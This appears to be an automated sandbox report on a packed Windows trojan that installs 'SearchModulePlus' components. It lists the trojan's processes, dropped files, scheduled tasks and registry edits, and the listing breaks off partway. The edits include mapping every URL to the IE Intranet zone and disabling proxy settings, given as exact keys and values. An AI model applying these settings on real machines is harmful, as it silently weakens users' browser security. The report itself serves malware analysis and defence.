MD5: 7eb426a62ac6ba16b6415eb482bd2bdf
SHA1: 73d6c87395a2caf4c66af7d227ddc10f4ea636a1
SHA256: 097bc56ab35e4d1c0efc394061273bca02eb846d254b6b0b4d687bbafd7bfa38
SSDeep: 24576:bamD3iBN1faFOdmIHm7d7ONpf7UyU/SaUOuqYvD3OSa:LGRspIHm7d7ipQ3PUOuqCA
Size: 1274839 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-05-11 23:03:36
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:1512
smu.exe:700
smu.exe:772
wscript.exe:532
sma.exe:2640
sma.exe:2836
sma.exe:2832
sma.exe:2776
sma.exe:1376

The Trojan injects its code into the following process(es):

%original file name%.exe:588
DC%original file name%.exe:1280
DC%original file name%.exe:492
ins_smk.exe:1968

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process smu.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)

The process smu.exe:700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (407 bytes)

The process %original file name%.exe:588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\DC%original file name%.exe (377459 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\23484DDB818EC9EA (34561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (35132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\D1989.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)

The process DC%original file name%.exe:1280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_2353\ins_smk.exe (54111 bytes)

The process ins_smk.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp\AccDownload.dll (11344 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (784 bytes)
%WinDir%\Tasks\SMWPUpd.job (1152 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (34561 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smfi32.dll (23296 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smei32.dll (24832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq5.tmp (312459 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smri32.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp\nsExec.dll (6 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (58402 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (2392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smoi32.dll (14184 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)

Registry activity

The process smu.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 27 DA 93 F2 3D 20 BF 52 A1 4E C8 7E D8 6E 54"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"
"Scf" = "FC F4 E4 5D D4 3D 8F 5D 10 57 66 5D 03 D6 7C B6"
"Ubl" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "C1 B9 30 9C 2D F0 A1 0B 5F FE 85 A5 61 06 C7 9E"
"Ult" = "Type: REG_QWORD, Length: 8"

The process smu.exe:700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 F6 D2 C8 58 E7 92 84 F5 BA 62 46 95 FC EB FE"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "45 2B EA BF B1 FC A5 25 95 D2 3C 5F AC 39 B7 5F"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "0E 67 60 5E E3 C9 4E D4 C3 0C 82 C4 22 7A B0 07"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "D9 A5 D4 C7 0B 94 E4 04 31 95 5A 08 A8 9B 13 3E"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

The process smu.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 17 83 0C 6E 04 B4 3B DA 54 FC D9 53 D7 69 9D"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "80 01 72 74 6D BD 45 8A 3B F2 06 7C 55 A4 99 55"

The process wscript.exe:532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 13 52 94 E3 61 C8 21 BA C4 97 FD F1 67 8C 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Goobzo\GBUpdatePlus]
"smu.exe" = "Search Module Plus Update Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process %original file name%.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 F8 6B D2 ED A8 E4 1A 36 E3 19 D5 93 37 E9 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process DC%original file name%.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 8A E3 BC 38 E7 FF 3C E9 48 3E BC C7 D5 07 E2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process DC%original file name%.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 97 6D 82 E8 DD A3 66 B3 F1 B3 3C 56 9D 2E EB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:2640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D A1 E8 E5 DA F2 7F 89 6B 0A 2E B3 B6 61 13 FE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 D2 BC 30 3B 25 4F 7B FB A1 09 C6 9F 8C A0 49"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 12 6E 2A 58 62 6C FB 81 FE 8C 5C 7C F6 D5 02"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 C3 2E BE 1F 61 16 04 17 9F 63 32 9E A2 9C AD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

